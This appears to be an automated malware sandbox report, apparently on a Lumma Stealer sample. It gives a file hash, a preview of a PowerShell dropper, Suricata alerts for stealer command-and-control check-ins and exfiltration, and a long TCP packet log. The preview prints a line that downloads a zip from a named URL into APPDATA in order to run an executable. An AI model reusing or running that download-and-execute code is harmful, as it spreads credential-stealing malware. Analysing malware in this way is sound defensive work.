TLSH:	14F0596761FC3231C2A082D2A69ADA41971B2C8A3009267F6B891115BD726B40BD66C9
File Content Preview:	$dxf = 'https://jerseysurffilmfestival.com/wakena.zip'.$bgn = "$env:APPDATA\pkz.zip".$jvk = "$env:APPDATA\Extra".$txl = Join-Path $jvk 'bubs.exe'..if (!(Test-Path $jvk)) { New-Item -Path $jvk -ItemType Directory }..Invoke-WebRequest -Uri $dxf -OutFile $bg

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T12:39:05.318740+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49774	188.114.96.3	443	TCP
2024-11-20T12:39:06.277618+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49774	188.114.96.3	443	TCP
2024-11-20T12:39:06.277618+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49774	188.114.96.3	443	TCP
2024-11-20T12:39:06.867010+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49785	188.114.96.3	443	TCP
2024-11-20T12:39:07.898289+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49785	188.114.96.3	443	TCP
2024-11-20T12:39:07.898289+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49785	188.114.96.3	443	TCP
2024-11-20T12:39:08.559667+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49797	188.114.96.3	443	TCP
2024-11-20T12:39:09.081508+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49797	188.114.96.3	443	TCP
2024-11-20T12:39:09.791218+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49805	188.114.96.3	443	TCP
2024-11-20T12:39:11.111269+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49816	188.114.96.3	443	TCP
2024-11-20T12:39:13.386872+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49833	188.114.96.3	443	TCP
2024-11-20T12:39:14.805694+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49844	188.114.96.3	443	TCP
2024-11-20T12:39:16.450506+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49855	188.114.96.3	443	TCP
2024-11-20T12:39:16.840167+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49855	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 12:38:56.325628042 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:56.325690985 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:56.325773001 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:56.342478037 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:56.342516899 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:56.984307051 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:56.984447956 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:56.988657951 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:56.988672972 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:56.988981009 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.003161907 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.043332100 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.235675097 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.289808989 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.316428900 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316442966 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316472054 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316485882 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316504002 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316512108 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.316534996 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.316577911 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.316601992 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.332267046 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.332335949 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.332344055 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.332406044 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.364769936 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.364795923 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.364864111 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.364891052 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.414813042 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.417445898 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.417463064 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.417503119 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.417525053 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.417565107 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.417593002 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.417613029 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.417678118 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.419524908 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.419547081 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.419615030 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.419631958 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.419706106 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.457370043 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.457389116 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.457468987 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.457519054 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.457606077 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.487724066 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.487740993 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.487817049 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.487852097 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.487920046 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.510096073 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.510118008 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.510210991 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.510241985 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.510297060 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.510840893 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.510906935 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.510915041 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.512819052 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.512834072 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.512880087 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.512896061 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.512917042 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.513098001 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.513112068 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.513161898 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.513171911 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.514090061 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.514103889 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.514151096 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.514159918 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.514188051 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.546689987 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.546705961 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.546819925 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.546821117 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.546896935 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.554672003 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.554688931 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.554748058 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.554778099 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.554799080 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.590667009 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.590706110 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.590754986 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.590775013 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.590825081 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.591587067 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.591602087 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.591655970 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.591665030 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.602358103 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.602374077 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.602427959 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.602451086 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.602488995 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.603353977 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.603378057 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.603446007 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.603461027 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.604443073 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.604469061 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.604515076 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.604531050 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.604603052 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.607558012 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.620944023 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.636673927 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.636697054 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.636779070 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.636852980 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.636877060 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.637238026 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.637259007 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.637300014 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.637316942 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.637334108 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.645179033 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.645193100 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.645267010 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.645312071 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.669203997 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.682471037 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.682490110 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.682578087 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.682626009 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.692527056 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.692548990 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.692595005 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.692609072 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.692646027 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.693612099 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.693628073 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.693681002 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.693687916 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.693718910 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.694638968 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.694657087 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.694711924 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.694717884 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.694736004 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.696207047 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.696221113 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.696279049 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.696289062 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.696295023 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.714708090 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.727657080 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.727677107 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.727740049 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.727756977 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.728410006 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.728429079 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.728491068 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.728499889 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.736712933 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.736726999 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.736805916 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.736819983 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.770823002 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.770844936 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.770901918 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.770936012 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.770960093 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.781306982 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.781358957 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.781385899 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.781461000 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.781482935 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.781924963 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.781943083 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.781985998 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.782001019 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.782025099 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.782912016 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.782927036 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.782970905 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.782984972 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.783019066 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.783983946 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.784002066 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.784054041 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.784069061 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.784089088 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.796366930 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.822894096 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.822918892 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.822989941 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.823023081 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.823048115 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.823590040 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.823607922 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.823667049 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.823681116 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.823717117 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.831073999 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.831091881 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.831152916 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.831170082 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.831197977 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.864347935 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.864372015 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.864442110 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.864492893 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.864507914 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.874296904 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.874314070 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.874365091 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.874378920 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.875474930 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.875492096 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.875545025 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.875552893 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876091003 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876104116 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876159906 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.876167059 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876919031 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876935959 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.876975060 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.876981974 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.877012968 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.910810947 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.910831928 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.910903931 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.910918951 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.910927057 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.911626101 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.911645889 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.911699057 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.911708117 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.911734104 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.920494080 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.920510054 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.920569897 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.920588017 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.920595884 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.953726053 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.953752995 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.953947067 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.953984022 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.956950903 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.964689016 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.964714050 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.964875937 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.964909077 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.966284037 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.966305017 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.966476917 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.966492891 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.967293024 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.967339993 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.967356920 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.967371941 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.967406988 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.968157053 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.968174934 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.968211889 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:57.968225002 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:57.968236923 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.000245094 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000269890 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000449896 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.000489950 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000801086 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000819921 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000859976 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.000870943 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.000917912 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.009896040 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.009917021 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.010035038 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.010071993 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.043270111 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.043302059 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.043421030 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.043458939 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.054553032 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.054575920 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.054825068 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.054894924 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.055705070 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.055725098 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.055756092 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.055809021 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.055830956 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.055862904 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.056600094 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.056618929 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.056675911 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.056689978 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.056731939 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.057344913 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.057364941 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.057416916 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.057429075 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.057461023 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.092511892 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.092535019 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.092725992 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.092752934 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.093193054 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.093214035 CET	443	49721	185.61.154.28	192.168.2.6
